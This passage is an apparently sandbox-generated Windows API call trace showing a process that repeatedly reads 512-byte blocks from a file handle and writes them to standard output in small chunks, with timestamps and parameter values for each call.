nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.711] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.711] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] GetFileType (hFile=0x4c) returned 0x1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] GetFileType (hFile=0x4c) returned 0x1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] GetFileType (hFile=0x4c) returned 0x1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.711] GetFileType (hFile=0x4c) returned 0x1 [0092.711] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] GetFileType (hFile=0x4c) returned 0x1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] GetFileType (hFile=0x4c) returned 0x1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] GetFileType (hFile=0x4c) returned 0x1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, 
lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] GetFileType (hFile=0x4c) returned 0x1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.712] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.712] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] GetFileType (hFile=0x4c) returned 0x1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] GetFileType (hFile=0x4c) returned 0x1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] GetFileType (hFile=0x4c) returned 0x1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] GetFileType (hFile=0x4c) returned 0x1 [0092.712] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] GetFileType (hFile=0x4c) returned 0x1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] GetFileType (hFile=0x4c) returned 0x1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] GetFileType (hFile=0x4c) returned 0x1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] GetFileType (hFile=0x4c) returned 0x1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.713] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.713] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] GetFileType (hFile=0x4c) returned 0x1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] GetFileType (hFile=0x4c) returned 0x1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] GetFileType (hFile=0x4c) returned 0x1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] GetFileType (hFile=0x4c) returned 0x1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] GetFileType (hFile=0x4c) returned 0x1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, 
lpOverlapped=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] GetFileType (hFile=0x4c) returned 0x1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] GetFileType (hFile=0x4c) returned 0x1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] GetFileType (hFile=0x4c) returned 0x1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.714] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.714] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] GetFileType (hFile=0x4c) returned 0x1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] GetFileType (hFile=0x4c) returned 0x1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] WriteFile (in: hFile=0x4c, 
lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] GetFileType (hFile=0x4c) returned 0x1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] GetFileType (hFile=0x4c) returned 0x1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] GetFileType (hFile=0x4c) returned 0x1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] GetFileType (hFile=0x4c) returned 0x1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] GetFileType (hFile=0x4c) returned 0x1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] GetFileType (hFile=0x4c) returned 0x1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.715] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.715] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] GetFileType (hFile=0x4c) returned 0x1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] GetFileType (hFile=0x4c) returned 0x1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] GetFileType (hFile=0x4c) returned 0x1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0092.715] GetFileType (hFile=0x4c) returned 0x1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] GetFileType (hFile=0x4c) returned 0x1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] GetFileType (hFile=0x4c) returned 0x1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] GetFileType (hFile=0x4c) returned 0x1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] GetFileType (hFile=0x4c) returned 0x1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.716] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.716] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] GetFileType (hFile=0x4c) returned 0x1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] GetFileType (hFile=0x4c) returned 0x1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] GetFileType (hFile=0x4c) returned 0x1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] GetFileType (hFile=0x4c) returned 0x1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] GetFileType (hFile=0x4c) returned 0x1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: 
lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] GetFileType (hFile=0x4c) returned 0x1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] GetFileType (hFile=0x4c) returned 0x1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] GetFileType (hFile=0x4c) returned 0x1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.717] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.717] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] GetFileType (hFile=0x4c) returned 0x1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] GetFileType (hFile=0x4c) returned 0x1 [0092.717] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0092.717] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] GetFileType (hFile=0x4c) returned 0x1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] GetFileType (hFile=0x4c) returned 0x1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] GetFileType (hFile=0x4c) returned 0x1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] GetFileType (hFile=0x4c) returned 0x1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] GetFileType (hFile=0x4c) returned 0x1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0092.718] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] GetFileType (hFile=0x4c) returned 0x1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.718] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.718] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] GetFileType (hFile=0x4c) returned 0x1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] GetFileType (hFile=0x4c) returned 0x1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] GetFileType (hFile=0x4c) returned 0x1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c 